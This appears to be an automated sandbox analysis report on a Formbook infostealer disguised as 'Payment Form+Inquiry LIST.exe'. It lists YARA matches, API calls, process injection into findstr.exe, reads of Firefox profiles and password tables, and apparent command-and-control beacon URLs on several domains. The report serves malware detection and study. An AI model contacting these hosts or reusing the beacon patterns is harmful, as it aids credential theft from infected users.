            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3785973000.0000000002AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: findstr.exe, 00000007.00000003.1811093551.0000000007A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033V
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002AFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: findstr.exe, 00000007.00000002.3792132594.0000000003BF6000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000003846000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1922034773.000000002FC86000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://valerieomage.com/c7rq?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: findstr.exe, 00000007.00000002.3794084439.0000000005FA0000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3792132594.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.000000000498C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.etmt194.com/s1/yurjyyya
            Source: findstr.exe, 00000007.00000002.3792132594.0000000003F1A000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000003B6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.kosherphonestore.com/ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixt
            Source: QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000047FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.lavillitadepapa.com/i1fz/?mZytyNB=69
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004562000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000041B2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.siteblogoficialon.com/xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8

            E-Banking Fraud

            Source: Yara matchFile source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: Payment Form+Inquiry LIST.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_0042B593 NtClose,3_2_0042B593
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A35C0 NtCreateMutant,LdrInitializeThunk,3_2_051A35C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_051A2DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_051A2C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2B60 NtClose,LdrInitializeThunk,3_2_051A2B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A4650 NtSuspendThread,3_2_051A4650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A3010 NtOpenDirectoryObject,3_2_051A3010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A3090 NtSetValueKey,3_2_051A3090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A4340 NtSetContextThread,3_2_051A4340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2D10 NtMapViewOfSection,3_2_051A2D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A3D10 NtOpenProcessToken,3_2_051A3D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2D00 NtSetInformationFile,3_2_051A2D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2D30 NtUnmapViewOfSection,3_2_051A2D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A3D70 NtOpenThread,3_2_051A3D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2DB0 NtEnumerateKey,3_2_051A2DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2DD0 NtDelayExecution,3_2_051A2DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2C00 NtQueryInformationProcess,3_2_051A2C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2C60 NtCreateKey,3_2_051A2C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2CA0 NtQueryInformationToken,3_2_051A2CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2CC0 NtQueryVirtualMemory,3_2_051A2CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2CF0 NtOpenProcess,3_2_051A2CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2F30 NtCreateSection,3_2_051A2F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2F60 NtCreateProcessEx,3_2_051A2F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2F90 NtProtectVirtualMemory,3_2_051A2F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2FB0 NtResumeThread,3_2_051A2FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2FA0 NtQuerySection,3_2_051A2FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2FE0 NtCreateFile,3_2_051A2FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2E30 NtWriteVirtualMemory,3_2_051A2E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2E80 NtReadVirtualMemory,3_2_051A2E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2EA0 NtAdjustPrivilegesToken,3_2_051A2EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2EE0 NtQueueApcThread,3_2_051A2EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A39B0 NtGetContextThread,3_2_051A39B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2B80 NtQueryInformationFile,3_2_051A2B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2BA0 NtEnumerateValueKey,3_2_051A2BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2BF0 NtAllocateVirtualMemory,3_2_051A2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2BE0 NtQueryValueKey,3_2_051A2BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2AB0 NtWaitForSingleObject,3_2_051A2AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2AD0 NtReadFile,3_2_051A2AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 3_2_051A2AF0 NtWriteFile,3_2_051A2AF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F84340 NtSetContextThread,LdrInitializeThunk,7_2_02F84340
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F84650 NtSuspendThread,LdrInitializeThunk,7_2_02F84650
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F835C0 NtCreateMutant,LdrInitializeThunk,7_2_02F835C0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82AF0 NtWriteFile,LdrInitializeThunk,7_2_02F82AF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82AD0 NtReadFile,LdrInitializeThunk,7_2_02F82AD0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82B60 NtClose,LdrInitializeThunk,7_2_02F82B60
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F839B0 NtGetContextThread,LdrInitializeThunk,7_2_02F839B0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02F82EE0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82FE0 NtCreateFile,LdrInitializeThunk,7_2_02F82FE0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82FB0 NtResumeThread,LdrInitializeThunk,7_2_02F82FB0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82F30 NtCreateSection,LdrInitializeThunk,7_2_02F82F30
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02F82CA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02F82C70
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82C60 NtCreateKey,LdrInitializeThunk,7_2_02F82C60
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02F82DF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82DD0 NtDelayExecution,LdrInitializeThunk,7_2_02F82DD0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02F82D30
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02F82D10
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F83090 NtSetValueKey,7_2_02F83090
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F83010 NtOpenDirectoryObject,7_2_02F83010
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82AB0 NtWaitForSingleObject,7_2_02F82AB0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82BF0 NtAllocateVirtualMemory,7_2_02F82BF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82BE0 NtQueryValueKey,7_2_02F82BE0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82BA0 NtEnumerateValueKey,7_2_02F82BA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82B80 NtQueryInformationFile,7_2_02F82B80
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82EA0 NtAdjustPrivilegesToken,7_2_02F82EA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82E80 NtReadVirtualMemory,7_2_02F82E80
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82E30 NtWriteVirtualMemory,7_2_02F82E30
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82FA0 NtQuerySection,7_2_02F82FA0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82F90 NtProtectVirtualMemory,7_2_02F82F90
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82F60 NtCreateProcessEx,7_2_02F82F60
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82CF0 NtOpenProcess,7_2_02F82CF0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82CC0 NtQueryVirtualMemory,7_2_02F82CC0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82C00 NtQueryInformationProcess,7_2_02F82C00
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82DB0 NtEnumerateKey,7_2_02F82DB0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F83D70 NtOpenThread,7_2_02F83D70
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F83D10 NtOpenProcessToken,7_2_02F83D10
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_02F82D00 NtSetInformationFile,7_2_02F82D00
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006E8000 NtDeleteFile,7_2_006E8000
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006E8090 NtClose,7_2_006E8090
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006E7DC0 NtCreateFile,7_2_006E7DC0
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 7_2_006E7F20 NtReadFile,7_2_006E7F20
            Source: Payment Form+Inquiry LIST.exeBinary or memory string: OriginalFilename vs Payment Form+Inquiry LIST.exe
            Source: Payment Form+Inquiry LIST.exe, 00000000.00000002.1332232004.00007FF6E8427000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDISPATCHMETHODremoveModuleResolve.dlld" vs Payment Form+Inquiry LIST.exe
            Source: Payment Form+Inquiry LIST.exe, 00000000.00000002.1325838473.0000022621800000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDISPATCHMETHODremoveModuleResolve.dlld" vs Payment Form+Inquiry LIST.exe
            Source: Payment Form+Inquiry LIST.exeBinary or memory string: OriginalFilenameDISPATCHMETHODremoveModuleResolve.dlld" vs Payment Form+Inquiry LIST.exe
            Source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Payment Form+Inquiry LIST.exeStatic PE information: Section: .rsrc ZLIB complexity 0.996767869636194
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/1@14/9
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeCode function: 0_2_00007FF6E8262B30 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,0_2_00007FF6E8262B30
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
            Source: C:\Windows\SysWOW64\findstr.exe File created: C:\Users\user\AppData\Local\Temp\H0840I45
            Source: Payment Form+Inquiry LIST.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
            Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: findstr.exe, 00000007.00000002.3785973000.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3785973000.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1812938186.0000000002B37000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3785973000.0000000002B37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Payment Form+Inquiry LIST.exeVirustotal: Detection: 56%
            Source: Payment Form+Inquiry LIST.exeReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe File read: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe
            Source: unknownProcess created: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe "C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe"
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            Source: C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
